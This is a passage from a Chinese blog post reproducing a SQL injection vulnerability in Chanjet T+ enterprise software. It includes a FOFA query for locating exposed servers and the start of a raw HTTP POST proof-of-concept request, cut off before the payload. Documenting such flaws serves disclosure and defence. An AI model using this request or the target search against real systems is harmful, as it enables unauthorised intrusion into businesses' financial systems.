畅捷通T+ SQL注入漏洞复现（QVD-2023-13612）

0xSecl

已于 2023-06-14 15:41:33 修改

阅读量3.6k

点赞数 2

分类专栏：漏洞复现文章标签：网络安全 web安全 sql

于 2023-06-14 15:28:56 首次发布

本文链接：https://blog.csdn.net/qq_41904294/article/details/131206758

版权

漏洞复现专栏收录该内容

该专栏为热销专栏榜第87名

701 篇文章 1073 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

0x01 产品简介

畅捷通 T+ 是一款基于互联网的新型企业管理软件，功能模块包括：财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用，融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。

0x02 漏洞概述

畅捷通T+的某后台功能点只校验了权限，未对用户的输入进行过滤，导致在权限绕过后存在SQL注入漏洞，利用此漏洞攻击者最终可以实现远程命令执行。

0x03 影响范围

畅捷通T+ 13.0

畅捷通T+ 16.0

0x04 复现环境

FOFA：app="畅捷通-TPlus"

0x05 漏洞复现

PoC

POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0

{"accNum": "3